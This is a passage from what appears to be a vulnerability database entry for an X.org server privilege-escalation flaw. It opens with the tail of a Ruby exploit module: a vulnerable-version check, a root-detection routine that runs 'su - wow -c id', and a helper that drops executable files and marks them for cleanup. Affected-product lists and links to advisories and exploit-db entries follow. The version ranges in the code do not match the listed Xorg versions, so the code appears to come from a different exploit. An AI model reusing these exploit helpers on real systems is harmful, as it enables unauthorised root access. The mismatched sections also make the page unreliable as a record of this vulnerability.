    semantic_version = Gem::Version.new(version)

    vulnerable_versions = [
      ['6.1.9.0', '6.1.9.100'],
      ['7.1.4.0', '7.1.4.30'],
      ['7.1.5.0', '7.1.5.31'],
      ['7.2.0.0', '7.2.0.1'],
      ['7.2.1.0', '7.2.1.0'],
      ['7.2.2.0', '7.2.2.0'],
      ['7.2.3.0', '7.2.3.15']
    ]

    vulnerable_versions.each do |version_pair|
      if semantic_version >= Gem::Version.new(version_pair[0]) && semantic_version <= Gem::Version.new(version_pair[1])
        return true
      end
    end
    return false
  end

  def root?
    id_output = cmd_exec('su - wow -c "id"')
    if id_output.include?('euid=0') || id_output.include?('uid=0')
      print_good('Got root!')
      return true
    end
    print_error('Not root')
    false
  end

  def upload_and_chmodx(path, data)
    print_status("Writing to #{path}")
    rm_f(path)
    write_file(path, data)
    cmd_exec("chmod 0555 '#{path}'")
    register_file_for_cleanup(path)
  end
end

Products Mentioned

Configuration 0

X.org >> Xorg-server >> versions before 1.20.3 (1.20.3 excluded)

Configuration 0

Redhat>>Enterprise_linux_desktop >> Version 7.0

Redhat>>Enterprise_linux_server >> Version 7.0

Redhat>>Enterprise_linux_server_aus >> Version 7.6

Redhat>>Enterprise_linux_server_eus >> Version 7.6

Redhat>>Enterprise_linux_server_tus >> Version 7.6

Redhat>>Enterprise_linux_workstation >> Version 7.0

Configuration 0

Canonical>>Ubuntu_linux >> Version 16.04

Canonical>>Ubuntu_linux >> Version 18.04

Canonical>>Ubuntu_linux >> Version 18.10

Configuration 0

Debian>>Debian_linux >> Version 9.0

References

https://www.exploit-db.com/exploits/45742/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.exploit-db.com/exploits/45922/
Tags : exploit, x_refsource_EXPLOIT-DB
https://usn.ubuntu.com/3802-1/
Tags : vendor-advisory, x_refsource_UBUNTU
https://www.exploit-db.com/exploits/45697/
Tags : exploit, x_refsource_EXPLOIT-DB
https://access.redhat.com/errata/RHSA-2018:3410
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/bid/105741
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/45908/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.exploit-db.com/exploits/46142/
Tags : exploit, x_refsource_EXPLOIT-DB
https://security.gentoo.org/glsa/201810-09
Tags : vendor-advisory, x_refsource_GENTOO
http://www.securitytracker.com/id/1041948
Tags : vdb-entry, x_refsource_SECTRACK
https://www.exploit-db.com/exploits/45832/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.exploit-db.com/exploits/45938/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.debian.org/security/2018/dsa-4328
Tags : vendor-advisory, x_refsource_DEBIAN